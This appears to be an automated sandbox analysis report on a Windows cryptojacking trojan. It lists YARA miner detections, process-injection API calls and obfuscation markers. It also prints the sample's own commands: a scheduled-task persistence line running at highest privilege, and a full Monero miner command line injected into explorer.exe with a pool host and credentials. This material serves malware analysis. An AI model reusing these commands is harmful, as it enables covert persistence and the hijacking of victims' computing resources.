Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D58 NtAllocateVirtualMemory, 10_2_00401D58
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D18 NtWriteVirtualMemory, 10_2_00401D18
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_004019D8 NtCreateThreadEx, 10_2_004019D8
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D98 NtProtectVirtualMemory, 10_2_00401D98
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401C98 NtClose, 10_2_00401C98
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00007FFA3625A30E NtUnmapViewOfSection, 17_2_00007FFA3625A30E
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA3626A3EE NtUnmapViewOfSection, 21_2_00007FFA3626A3EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D58 NtAllocateVirtualMemory, 22_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D18 NtWriteVirtualMemory, 22_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_004019D8 NtCreateThreadEx, 22_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D98 NtProtectVirtualMemory, 22_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401C98 NtClose, 22_2_00401C98
Sample file is different than original file name gathered from version info
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655959061.000000000370C000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmp Binary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: sistem.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00044194799
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00537109375
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00051229508
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.0107421875
Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.00051229508
Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.00054824561
Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.0107421875
Source: sistem.exe.1.dr Static PE information: Section: .rsrc ZLIB complexity 0.995659722222
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Yandex
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6040)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Temp\sistem.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_01
Source: explorer.exe String found in binary or memory: id-cmc-addExtensions
Source: explorer.exe String found in binary or memory: set-addPolicy
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\conhost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static file information: File size 3609088 > 1048576
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Raw size of (nameless section) is bigger than: 0x100000 < 0x2f2e00
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C3665 push ss; retf 0_3_026C3658
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C36AF push ss; retf 0_3_026C3658
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BC283 push ebp; iretd 0_3_026BC2D7
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BECAF pushfd ; ret 0_3_026BECD9
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BC49B push esp; retf 0000h 0_3_026BC49C
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C1498 push ebp; ret 0_3_026C14A0
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BD161 push edi; iretd 0_3_026BD163
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BD1D3 push cs; retf 0_3_026BD1DB
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BF1B4 push ecx; iretd 0_3_026BF1C3
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C4980 push ecx; retf 0_3_026C4981
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C2591 push edx; ret 0_3_026C259D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05644650 push esp; iretd 1_2_0564465D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_0564460E push es; ret 1_2_05644610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05643C58 push esp; iretd 1_2_05643C91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05643C92 push esp; iretd 1_2_05643C91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05645F40 push es; ret 1_2_05645F50
